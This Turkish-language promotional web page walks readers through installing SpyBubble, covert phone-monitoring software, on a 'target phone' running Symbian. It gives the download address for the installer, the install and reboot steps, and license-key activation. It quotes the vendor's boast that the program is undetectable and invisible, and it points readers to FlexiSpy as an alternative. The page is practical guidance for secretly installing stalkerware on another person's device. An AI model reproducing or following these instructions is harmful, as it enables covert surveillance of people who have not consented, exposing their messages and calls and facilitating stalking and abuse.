Bir Sayfa Seçin

SpyBubble Kurulumu

Spy Bubble Nasıl Kurulur? SpyBubble Kurulumu zormu? Gelen sorular üzerine Android, Symbian, Blackberry, Windows Mobile, Iphone3 ve Iphone4 için SpyBubble Kurulumunu adım adım göstermeye karar verdik. Bu yazı içerisinde her bir işletim sistemine ilişkin olarak SpyBubble Kurulumunun nasıl yapılacağını görebilirsiniz. Kurulum aşamalarına geçmeden önce SpyBubble’ın hangi telefonlar tarafından kullanılabileceğini merak edenler tüm uyumlu telefonların listesine buraya tıklayarak ulaşabilirler.

NOT: Eğer tıkladığınızda sayfa açılmıyor ise bu linki deneyin (http://www.spybubble.com/supportedphones.php)

İlgili listeden uyumlu cep telefonlarını öğrendikten sonra kurulum için hedef telefonun İşletim sistemine göre aşağıdaki adımları takip edebilirsiniz.

SpyBubble SymbianOS Kurulumu

SpyBubble kurulum işlemi oldukça basit ve sadece birkaç dakikanızı alacak. Programı kurduktan sonra SpyBubble özelliklerinden faydalanmaya başlayabilirsiniz.

Eğer programı satın aldıysanız buraya tıklayarak bilgileri görebileceğiniz siteye ulaşabilirsiniz. Siteye ulaştığınızda kayıt esnasında belirlemiş olduğunuz Kullanıcı Adı (Username) ve Şifre (Password) bilgilerini kullanarak sisteme giriş yapabilirsiniz. Eğer şifrenizi unuttuysanız buraya tıklayın.

Henüz SpyBubble için kayıt olmadıysanız. Buraya tıklayarak kayıt işleminizi gerçekleştirebilirsiniz.

ÜRETİCİ NOTU: Unutmayın, SpyBubble tespit edilemez ve görülemez bir Symbian işletim sistemi programıdır. Bu konunun ne kadar hassas olduğunu bildiğimiz için her tür şart altında görünmezliğini test ettik.

NOT: Aşağıdaki bilgiler spybubble için geçerli bilgiler. Ancak SpyBubble satışları durdurulmuş olarak gözüküyor.Bunun yerine FLEXISPY düşünebilirsiniz.

SpyBubble Kurulum aşamasında hedef telefonu bilgisayara bağlamanıza gerek yok.

  1. Hedef telefon üzerinde Internet bağlantısını açın ve adress çubuğuna aynen şu adresi yazın.
    http://www.spybubble.com/symbian/radio.sis
    SpyBubble Symbin Kurulum web adresi
  2. Install SBubble (SBubble Kurulum Sihirbazı) gözükecek
    spybubble symbian kurulum download spyubble
  3. “YES” diyerek kurulumun geri kalan adımlarına izin veriyorsunuz.
    spybubble symbian kurulum install spyubblesymb5 symb4
  4. Kısa bir süre sonra kurulumun başladığını göreceksiniz. %100 tamamlandığında hemen telefonu kapatıp açın. Programın kurulumunun tamamlanması ve sorunsuz bir biçimde çalışması için telefonun kapatılıp açılması gerekmektedir.
    spybubble symbian kurulum tamamlandı
  5. Bundan sonraki aşamada SpyBubble satın aldıktan sonra size verilen “Lisans Anahtarını – License Key” ‘i üye alanındaki panelinizdeki konfigurasyon bölümüne girmeniz gerekmektedir.   symb14symb15
    symb16
    symb17
    symb18Artık hedef telefona SpyBubble Symbian Kurulumunu gerçekletirdiniz. Bir kaç numara arayarak ve mesaj göndererek SpyBubble panelinizden kontrollerinizi yapabilirsiniz. Henüz SpyBubble almadıysanız almak için buraya ya da aşağıdaki resme tıklayabilirsiniz.

cep-telefonu-casus-programi

Benzer Konular: